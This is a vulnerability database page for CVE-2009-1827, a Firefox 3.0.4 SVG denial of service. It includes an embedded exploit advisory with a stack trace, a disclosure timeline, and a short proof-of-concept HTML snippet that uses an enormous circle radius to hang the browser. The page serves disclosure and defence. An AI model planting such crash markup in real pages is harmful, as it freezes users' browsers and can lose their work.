CVE-2009-1827 : Detail

CVE-2009-1827

13.02%V4
Network
2009-05-29
18h00 +00:00
2018-10-10
16h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The SVG component in Mozilla Firefox 3.0.4 allows remote attackers to cause a denial of service (application hang) via a large value in the r (aka Radius) attribute of a circle element, related to an "unclamped loop."

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 8794

Publication date : 2009-05-25 22h00 +00:00
Author : Thierry Zoller
EDB Verified : Yes

From the low-hanging-fruit-department Firefox et al. Denial of Service - All versions supporting SVG ________________________________________________________________________ CHEAP Plug : ************************************************************************ You are invited to participate in HACK.LU 2009, a small but concentrated luxemburgish security conference. More information : http://www.hack.lu CFP is open, sponsorship is still possible and warmly welcomed! ************************************************************************ Release mode: Forced release. Ref : [TZO-26-2009] - Firefox DoS (unclamped loop) SVG WWW : http://blog.zoller.lu/2009/04/advisory-firefox-dos-condition.html Vendor : http://www.firefox.com Status : No patch CVE : none provided Credit : none Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=465615 Security notification reaction rating : There wasn't any reaction. OSS Security notification FTW Notification to patch window : x+n Disclosure Policy : http://blog.zoller.lu/2008/09/notification-and-disclosure-policy.html Affected products : - Firefox all supporting SVG (didn't care to investigate which, task of the vendor) - all software packages using mozilla engine and allowing SVG I. Background ~~~~~~~~~~~~ Firefox is a popular internet browser. II. Description ~~~~~~~~~~~~~~ This bug is a typical result of what we call unclamped loop. An "attacker" will give the Radius value of the Circle attribute a very big value. That is leetness. Stack trace : ntkrnlpa.exe+0x6e9ab ntkrnlpa.exe!MmIsDriverVerifying+0xbb0 hal.dll+0x2ef2 xul.dll!NS_InvokeByIndex_P+0x30c36 xul.dll!NS_InvokeByIndex_P+0x30e8a xul.dll!NS_InvokeByIndex_P+0x30e02 xul.dll!NS_InvokeByIndex_P+0x30f5e xul.dll!XRE_InitEmbedding+0x7858 xul.dll!XRE_InitEmbedding+0xf4ee xul.dll!XRE_TermEmbedding+0x11411 xul.dll!gfxTextRun::Draw+0xdd4d xul.dll!gfxTextRun::Draw+0xe1ca xul.dll!gfxWindowsPlatform::PrefChangedCallback+0x1495 xul.dll!gfxTextRun::SetSpaceGlyph+0x2678 xul.dll!gfxFont::NotifyLineBreaksChanged+0xf1d3 xul.dll!gfxWindowsPlatform::RunLoader+0xa9f6 xul.dll!NS_StringCopy_P+0x9942 xul.dll!gfxImageSurface::gfxImageSurface+0x3188 xul.dll!gfxImageSurface::gfxImageSurface+0x2ed8 Also produces exceptions in MOZCRT19... MOZCRT19!modf+0x2570: 600715e0 660f122550450960 movlpd xmm4,qword ptr [MOZCRT19!exception::`vftable'+0x1a3d8 (60094550)] ds:0023:60094550=3fe62e42fefa39ef III. Impact ~~~~~~~~~~ Browser doesn't respond any longer to any user input, all tabs are no longer accessible, your work if any (hail to the web 2.0) might be lost. IV. Proof of concept (hold your breath) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ <html xmlns='http://www.w3.org/1999/xhtml'> <head> </head> <body> <svg xmlns='http://www.w3.org/2000/svg'><circle cx='10' cy='10' r='1.79769313486231E+308' fill='red' /></svg> </body></html> IV. Disclosure timeline ~~~~~~~~~~~~~~~~~~~~~~~~ DD/MM/YYYY 18/11/2008 : Created bugzilla entry (security) with proof of concept, description the terms under which ooperate and the planned disclosure date. 24/22/2008 : Daniel Veditz comments : "Might be a cairo bug rather than SVG (seems to be looping in libthebes), but I can definitely confirm the DoS. 14/12/2008 : Ask for any action plan and my assessement of considering it low risk No reply. 28/12/2008 : "Timeless" comments [..] personally, i intend to open this bug to the public [..] a bug like this is more likely to be fixed by being visible to more people than by leaving it in a closet. 26/05/2009 : In 2009 I agree; release of this advisory. # milw0rm.com [2009-05-26]

Products Mentioned

Configuraton 0

Mozilla>>Firefox >> Version 3.0.4

References

https://www.exploit-db.com/exploits/8794
Tags : exploit, x_refsource_EXPLOIT-DB
The information presented on CVE Find originates from several carefully selected reference sources. CVE data is provided by MITRE Corporation and the National Vulnerability Database (NVD). The Known Exploited Vulnerabilities (KEV) catalog is sourced from the Cybersecurity and Infrastructure Security Agency (CISA), while EPSS scores come from FIRST.org. Additionally, data regarding software weaknesses (CWE) and common attack patterns (CAPEC) is maintained by MITRE Corporation, and information on hardware and software configurations (CPE) is provided by the NVD.